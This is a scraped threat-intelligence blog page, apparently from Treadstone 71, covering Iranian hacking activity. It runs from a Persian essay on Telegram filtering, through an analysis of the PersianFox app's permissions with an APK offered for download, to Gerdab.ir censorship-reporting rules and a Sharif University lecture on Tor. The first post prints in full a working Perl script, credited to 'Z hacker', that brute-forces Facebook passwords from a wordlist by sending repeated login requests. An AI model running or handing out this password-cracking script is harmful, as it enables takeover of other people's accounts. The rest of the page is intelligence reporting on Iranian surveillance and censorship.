Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

 

 

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

 

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com&#8221;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

 

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

 

واکسنی به اسم فیلترینگ

💉 واکسنی به اسم فیلترینگ

دهم دی ماه سال 1396 محبوب ترین پیام رسان خارجی در ایران به دستور” شورای عالی امنیت ملی ” فیلتر و 14 روز بعد در تاریخ 23 دی ماه رفع فیلتر شد. پیام رسانی که به نقل قول های متعدد بیش از 40% کاربران آن را مشترکان ایرانی تشکیل می دهند.

این درحالی‌ است که به گفته رئیس انجمن صنفی کسب و کارهای اینترنتی “حدود نیم میلیون فرصت شغلی که وارد این شبکه‌های مجازی شده‌اند و همچنین چند شرکت دانش بنیان خدمات تخصصی در این زمینه، پس از فیلترینگ معلق شدند”.

همچنین به گفته سید مرتضی موسویان رئیس مرکز توسعه فناوری اطلاعات و رسانه‌های دیجیتال وزارت ارشاد، در آمار رسمی این سازمان ۱۹ هزار کانال شامددار به ثبت رسیده که از این تعداد ۹۰۰۰ کانال مرتبط با فروش کالا یا خدمات بوده‌اند.

همه شما عزیزان به اهمیت فعالیت این پیام رسان در ایران، از همه جهات واقف هستید و مضرات فیلتر شدن تلگرام را بطور کامل می دانید ولی تا بحال به مزایای این فیلترینگ دقت کرده اید؟ به نظر شما 2 هفته فیلتر شدن تلگرام چه بازخوردهای مثبتی به همراه داشت؟ آیا پیش از فیلترینگ این پیام رسان به مزایای آن فکر شده بود ؟ در ادامه به نکاتی در این رابطه بصورت کاملا مختصر اشاره خواهیم کرد.

1. یکی از مهمترین مزایای این دوره طلایی افزایش سواد عمومی جامعه در حوزه IT در درک تفاوت بین پروتکل های مختلف، آشنایی مختصر با مفاهیم امنیتی و درک پورت و آی پی و استفاده از انواع و اقسام فیلتر شکن ها بود.بطوری که خیلی از مردم عزیز نحوه استفاده از سرورهای شخصی بعنوان فیلترشکن را یاد گرفته و به دست عموم رساندند و خیلی از عزیزان نحوه استفاده از این فیلترشکن ها را فراگرفتند.

2. از دیگر مزایای این طرح می توان به افزایش امنیت کاربران اشاره کرد بطوری که در این مدت هیچ یک از کاربران ایرانی به هیچ عنوان با استفاده از آدرس آی پی حقیقی خود از تلگرام استفاده نکرده و عملا احتمال امکان ردیابی کاربران در مصادیق مجرمانه در این دوهفته ، به شرط استفاده از شماره های مجازی نزدیک به صفر شد.

3. نکته حائز اهمیت دیگری که باعث متضرر شدن اپراتورهای همراه شد آشنا شدن مردم با نحوه استفاده از تماس صوتی بود تلگرام بود که مدت هاست بخاطر جلوگیری از ضرر به اپراتورهای همراه، بسته شده بود.

4. آمادگی بیش از پیش تلگرام برای جلوگیری از فیلتر شدن مجدد با راه اندازی شبکه باز تلگرام یا TON در فصل اول سال 2018 میلادی به گفته پاول دوروف، مدیر عامل و بنیان گذار تلگرام و همچنین کاهش بازه زمانی تکمیل این پروژه از سه ماه به یک ماه و تقریبا غیرقابل فیلتر شدن تلگرام از مزایای دیگر این طرح بود.

علاوه بر نکات بالا بازخوردهایی نیز در این میان کاملا محسوس بود که بعنوان مثال می توان به شکست سنگین پیام رسان های ایرانی حتی با اعمال فیلترینگ در رقابت با تلگرام، ناتوانی دولت در فیلتر کردن کامل یک شبکه اجتماعی، وابستگی اقتصادی و معیشتی مردم به شبکه های اجتماعی، ناکارآمد بودن طرح شامد در جلوگیری از فعالیت های غیر متعارف کانال های تلگرامی، افزایش اعتماد مردم به رعایت حریم شخصی کاربران توسط تلگرام و … اشاره کرد.

=-=-=-=-=-=-=

مطالب بیشتر :

تیم امنیتی ایران

@IrSecTeam_Org

 

تلگرام اره ای که امکان جابه جایی ان دیگر نیست: تلگرام دیگه برای یک ایرانی یک پیام رسان نیست، بلکه همه چیزی است که از اینترنت نیاز داره . خوبی ها و بدی های خودشو داره ولی مهمترین ضرری که تلگرام به ما میزنه به نظر من بسته بودن تلگرامه و جلوگیری اون از رشد اینترنت فارسی و تولید محتوی ، امروزه حتی افرادی که تلگرام دارن یک ایمیل ساده ندارن و نیازی هم نمیبینن که داشته باشن. دیگه وبلاگ نویس نمیبینید و همه یه کانال میزنن و مطالبشون رو اونجا مینویسن. مطالبی که هیچ وقت در اینترنت واقعی منتشر نمیشن و اگر شما لینک کانال یا اون گروه رو نداشته باشید هیچ وقت بهشون نمیرسید. مطمئنا این خوب نیست. یعنی فاجعه است . چرا این شد چرا تلگرام برای ما همه چی شد؟ جوابش ساده است به لطف فیلترینگ داسی سالهای پیش همه نیاز ها به سمت تلگرام کشیده شد. در فضایی که حتی یک وبلاگ با ۵ کاربر ماهانه بر روی بلاگفا تحمل نمیشد و مدیران وب سایت ها بابت یک کامنت بازداشت میشدن و سایت ها که همه چیز یک فرد بودن به راحتی فیلتر میشد مردم که خود عقل و شعور دارن ، اینجا احساس آرامش بیشتری داشتن. ولی آیا میشه تلگرام رو فیلتر کرد؟ جوابش ساده است : خیر. وقتی بیش از نیم میلیون شغل به گفته خود آقایان در تلگرام به وجود اومده دیگه شما فقط با تفریح یا خبر سر و کار ندارید بلکه دارید تصمیم مهتری میگیرید اینجا به سفره مردم هم وصل شده. البته قابل پیشبینی بود که ممکنه تلگرام فیلتر بشه ولی حوادث این روزها نشون داد که دیگه حتی تصمیم به فیلتر تلگرام از تصمیم به جهت دادن مردم به رفتن به سمتش غلط تر بود. چرا؟ جوابش در دانلود روزی ۷۰۰ هزار فیلترشکنه . باور کنید اگر رتبه بدترین کشور رو برای بدافزار های موبایل داریم دلیلش اینه که از ۱ بالاتر در این جدول دیگه جایگاهی نیست . من با حرف های سردار جلالی ریاست محترم پدافند غیر عامل موافقم بله تلگرام ایران رو اشغال کرده ولی دلیلش فقط شمایید که تنوع استفاده از سرویس های جهانی رو بروی ایرانی ها بستید و به امید اینکه شاید تلگرام شاید شاید به حرفتون گوش کنه با طنابش رفتید ته چاه و ملت رو هم بردید با خودتون. دیدید که در شرایط بحرانی قطعا تلگرام کانال هایی رو که لیست میکنید نمیبنده و فقط فیلتر تلگرام تاثیر حداکثر ۲ روزه بر روی مخاطبینش داره . ولی جالب تر از فیلتر تلگرام در این کشور استفاده همین مسئولین از سرویس های درست دنیا مثل تویتره . در همین شرایط تریبون وزرای محترم در حالی تویتره که سالهاست تویتر در ایران فیلتره !!. و جالب تر از اون اینه که حتی در شرایطی که تلگرام فیلتر نیست شما کانال رسمی یا گروه رسمی دولتی در اون نمیبینید ولی همزمان میتونید همه رو در تویتر پیدا کنید . برای کی توویت میکنن من نمیدونم :grin:. اگر دیوونه خونه نیست به منم بگید من بدونم کجاست. حالا باید دید رویکرد بعدی دولت محترم چیه و چطور این فاجعه اینترنت ایران که هر روز هم عمیق تر میشه رو مدیریت میکنه مطمئن باشید پاول برای همه ما خواب های رنگی تری هم دیده . پیشنهاد من باز کردن هر چه سریعتر سرویس های مهم دنیا به روی همه ایرانی هاست از جمله تویتر و فیسبوک و یوتیوب و تغییر نگرش داسی فیلترینگ به نگرش تعامل با دنیا و یا تبدیل نگرش داسی به ساتوری و بستن مطلق همه چی از تلگرام و فیلتر شکن ها گرفته تا هر چیزی که جدید میاد برای همیشه فقط مشکلش اینه که هر روز یه چیزی میاد تقریبا :joy: یا اینکه ببندیم اینترنت و راحت کنیم همه رو /// البته تجربه ثبات کرده حتما این اتفاقها نمیفته و همین مسیر شل کن و سفت کن رو میریم متاسفانه . جرجندی @webamoozir

گروه پرشین فاکس – The Persian Fox -the Farsi Telegram App

pfox2Recently in cyberspace and market software market such as Persian Telegram published a little different with the original telegram. Most Iranians are fearful of using the Persian Fox since the government monitors and surveils their every move. The preference is for the real Telegram to be used although, the Iranians sites there are infiltrated with Basij members who report on the comments of everyday Iranians as well as hackers. Attempts by Basij (the Iranian government) and other pro-gov organizations to penetrate and hack Telegram is underway.

There are a couple of files of interest:

  • persianfox.messenger.permission.C2D_MESSAGE
  • persianfox.messenger.permission.MAPS_RECEIVE

The access requirements are much different from the original Telegram, and the developer has not provided any explanation about the reason for this access. The features provide the programmer and anyone associated with the company who wrote the software, access to all your Telegram Farsi messages as well as the ability to enable your GPS and determine your location. That is just the beginning.  Below are the access requirements:

 

  • permission.USE_FINGERPRINTpfox3
  • Run at startup
  • Read phone state and identity
  • Draw over other apps
  • Shake control
  • Create accounts and set passwords
  • Read sync settings
  • Toggle sync on and off
  • Read your own contact card
  • Add or remove accounts
  • Modify your contacts
  • Read your contacts
  • Find accounts on the device
  • Read memory cards
  • Change or delete SD card contents
  • Prevent the device from going to sleep
  • Receive text messages (SMS)
  • View Wi-Fi connections
  • View network connections
  • voice recording
  • Full Internet access
  • Precise location (GPS and network-based)
  • Approximate location (network-based)
  • Web service access platform
  • persianfox.messenger.permission.C2D_MESSAGE
  • persianfox.messenger.permission.MAPS_RECEIVE
  • Get information from the Internet

pfox1This looks to be developed to the specifications of the Iranian government enabling them to track every bit and byte put forward by users of the app.  Persianfox is apropos. Remember the requirements from Gerdab.ir https://cybershafarat.com/2015/09/07/gerdab-ir-oppress-your-people-basij-turn-on-your-own-the-new-savak-pasdaran-and-basij-rules-of-oppression-reporting/

The full download my before at the Iranian online store Cafebazaar: https://cafebazaar.ir/app/ir.persianfox.messenger/?l=fa or you may download bazaar. Or you may acquire the APK below as provided by Treadstone 71:

ir.persianfox.messenger_721.fl (zip file – run at your own risk- in a lab environment preferably)

The source code may be found at github: https://github.com/mokhtarabadi/Telegram-Farsi

There are some interesting leads to follow here as well (happy hunting):

Treadstone 71

Learn more about Treadstone 71 and the new Cyber Intelligence Tradecraft Certification at

https://cybershafarat.com/2016/01/11/t71/ and http://www.treadstone71.com/images/FIles/CyberIntelTradecraftCertification.pdf

 

Fox Porn

 

Gerdab.ir – Oppress your people – Basij turn on your own. The new Savak – Pasdaran and Basij – Rules of Oppression Reporting

http://www.gerdab.ir/fa/report – GISTED

Report internet fraud:

This section introduces web content that is considered criminal by the people. Members can be distinguished based on the 5 following paragraphs; identifying offending Web sites for tracking and report to officials.

The content of the website is based is based upon the following criminal offenses:

Section A: Content against public morals and ethics

  1. Production, distribution, and trading of pornographic and vulgar content, including audio, video and written, true or false, and in different formats (video, photos, animation, online games, computer games, cartoons, etc. . .)
    1. Porn: show full nudity or male or female genitals, intercourse or a sexual act.
    2. Vulgar: The contents of a sexually stimulating images.
  2. Promote and sell products related to illegitimate and illegal sex.

Section B. contents against Islam

  1. Insulting Islam and its principles, insulting the Fourgerdabformteen Infallibles (SAW), insults and abuses against lslam and the realm of divine messengers.
    1. NOTE: The Fourteen Infallibles (Arabic: معصومون‎ Ma‘sūmūn) are Twelver Shī‘ah Islam religious figures from between the 6th and 9th century whom Twelver’s believe are infallible, i.e. “divinely bestowed [with] freedom from error and sin”. This quality of infallibility is known as Ismah. The Fourteen Infallibles are Muhammad (SAW), his daughter Fatima Zahra and the Twelve Imams.
    2. PBUH – Peace Be Upon Him
  2. Insulting Imam Khomeini, the Supreme Leader using animals and mutilated bodies to mimic certain of comments the leader has made.
  3. Promote attitudes and deviant religious sects (such as the Baha’i, Sufi, Satanism, etc.) and any such emerging false religions.
  4. The promoting of superstition witchery, palm reading, summoning spirits (séance) and the like

Section A: Content against public peace and security

  1. The setup and formation of cyber threats and radical acts of online terror and propaganda.
  2. Ethnic issues – trying to create a rift between ethnic groups and national security.
  3. Disclose and reveal the secrets and official documents (both military and civilian).

Section D: The Content on government and public officials

  1. Spreading lies against official and unofficial (explicit or otherwise) and with the intent to harm the Islamic Republic.
  2. Insulting and slandering the government and public institutions and organizations

Section E: The content for computer crimes and other offenses used

  1. Incite or encourage people to use drugs and psychotropic substances, commit suicide and violence
  2. Advertise for criminal activities such as the establishment and promotion of the economic pyramid schemes (organizations)
  3. The release of a virus, VPNs, proxies and other methods to circumvent government cyber controls
  4. Links to websites (including blogs and sites) that are blocked by the government (both domestic and foreign)

5 – Training on unauthorized access and eavesdropping, spying, disruption of computer systems.

Dear user,

Be rewarded by reporting … know we will verify what you send. We who perform Internet content filtering are grateful for your efforts.

So turn in anyone you wish since we watch you, you watch your family and friends, they watch you, the watchers are watched by other watchers and they are watched by us. 

Education on Anonymity – Sharif University Courses on How to Hide TOR

Well planned efforts by Iran to educate their students starts before University levels. Regardless, Iranian universities with funding from the government (IRGC), oversight by Basij, capture the flag exercises, internships through Ashiyane and AmnPardaz, and unauthorized testing on adversary websites provide a structured program. Much like the West, Iran is institutionalizing cyber in their young. The below is a lecture given at Sharif University using Western technologies and materials. The use of TOR is well explained.

Treadstone 71
817-902-lecture-19_Page_01

817-902-lecture-19_Page_02 817-902-lecture-19_Page_03 817-902-lecture-19_Page_04 817-902-lecture-19_Page_05 817-902-lecture-19_Page_06 817-902-lecture-19_Page_42 817-902-lecture-19_Page_41 817-902-lecture-19_Page_40 817-902-lecture-19_Page_39 817-902-lecture-19_Page_38 817-902-lecture-19_Page_37 817-902-lecture-19_Page_36 817-902-lecture-19_Page_35 817-902-lecture-19_Page_34 817-902-lecture-19_Page_33 817-902-lecture-19_Page_32 817-902-lecture-19_Page_31 817-902-lecture-19_Page_30 817-902-lecture-19_Page_29 817-902-lecture-19_Page_28 817-902-lecture-19_Page_27 817-902-lecture-19_Page_26 817-902-lecture-19_Page_25 817-902-lecture-19_Page_24 817-902-lecture-19_Page_23 817-902-lecture-19_Page_22 817-902-lecture-19_Page_21 817-902-lecture-19_Page_20 817-902-lecture-19_Page_19 817-902-lecture-19_Page_18 817-902-lecture-19_Page_17 817-902-lecture-19_Page_16 817-902-lecture-19_Page_15 817-902-lecture-19_Page_14 817-902-lecture-19_Page_13 817-902-lecture-19_Page_12 817-902-lecture-19_Page_11 817-902-lecture-19_Page_10 817-902-lecture-19_Page_09 817-902-lecture-19_Page_08 817-902-lecture-19_Page_07

Next Series – Iranian Cyber Capabilities

A few years back we targeted Iranian cyber capabilities with a high level overview. Many have posted information and reports online relative to this. In true Treadstone 71 spirit, we will follow will live data for download and review.

Due date has not been determined yet but it will be soon (soon in Middle Eastern terms).

In the mean time, a blast from the Treadstone 71 past:

Blog at WordPress.com.

Up ↑

%d bloggers like this: